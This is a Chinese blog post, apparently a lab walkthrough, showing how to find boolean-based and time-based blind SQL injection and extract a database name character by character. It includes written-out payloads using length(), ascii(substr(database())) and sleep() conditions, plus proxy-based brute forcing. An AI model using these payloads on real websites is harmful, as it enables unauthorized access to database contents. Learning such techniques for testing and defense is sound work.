当前位置: 首页 > news >正文

SQL注入-盲注靶场实战(手写盲注payload)--SRC获得库名即可

布尔盲注

进入页面

在这里插入图片描述

注入点


在这里插入图片描述

and 1=1
在这里插入图片描述

and 1=2
在这里插入图片描述
得知为布尔盲注

库名长度

and length(database()) = 8

抓包(浏览器自动进行了url编码)爆破在这里插入图片描述

得知为 12
在这里插入图片描述

库名字符

1 and ascii(substr(database(),1,1))=112 – q

(这里如果不再次抓包,需要对上述payload进行url编码)
在这里插入图片描述

第二处是32-126(可打印ASCII字符范围)

在这里插入图片描述

在线编码解码
在线去除空格

kanwolongxia

时间盲注

注入点

1" and sleep(5) – q
在这里插入图片描述

转圈圈,响应延时了,得知为时间盲注

库名长度

1" and if((length(database())=33),sleep(10),0) – q

抓包,爆破
在这里插入图片描述

从响应时长可以得知:12
在这里插入图片描述

库名字符

1" and if((ascii(substr(database(),1,1))=112),sleep(10),0) – q

在这里插入图片描述

kanwolongxia

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.dtcms.com/a/115192.html

相关文章:

  • 投资策略分析:十年年化32.2%,夏普比1.31的动量斜率策略(策略源码+数据下载)
  • LearnOpenGL-笔记-其九
  • RocketMQ 01
  • 实际犯错以及复盘1
  • FPGA同步复位、异步复位、异步复位同步释放仿真
  • GPMI:一线通联,创新无界
  • 2025-04-06 NO.2 Quest3 基础配置与打包
  • 【AI论文】重新思考视觉语言模型的强化学习扩展:一个透明的、从头开始的框架和全面的评估方案
  • 内存池整体框架设计
  • 网络安全应急响应-系统排查
  • Go语言-初学者日记(三):函数与方法
  • C 语 言 --- 指 针 2
  • MyBatis小技巧与MyBatis参数处理
  • 【Firewalld】Linux中firewall-cmd的基本使用
  • Runnable组件容灾回退机制 with_fallback 深度解析降低程序错误率
  • 单链表的实现 | 附学生信息管理系统的实现
  • 3D打印技术助力高精密零件制造与维修工具革新
  • C# Winform 入门(13)之通过WebServer查询天气预报
  • 网络钓鱼攻击的威胁和执法部门的作用(第一部分)
  • 架构师面试(二十六):系统拆分
  • 【Csharp】获取实时的鼠标光标位置,测试用——做窗口软件绘图需要确定光标位置
  • GenerationMixin概述
  • Python Cookbook-5.5 根据内嵌的数字将字符串排序
  • 清明假期间
  • 数据分析-Excel-学习笔记
  • AI大模型:(二)2.1 从零训练自己的大模型概述
  • 【LeetCode 热题100】55:跳跃游戏(详细解析)(Go语言版)
  • 用python来操作mysql(复习一,主要是mysql连接和授权)
  • 【清明折柳】写在扬马三周目后
  • 【NLP 54、大模型训练相关知识】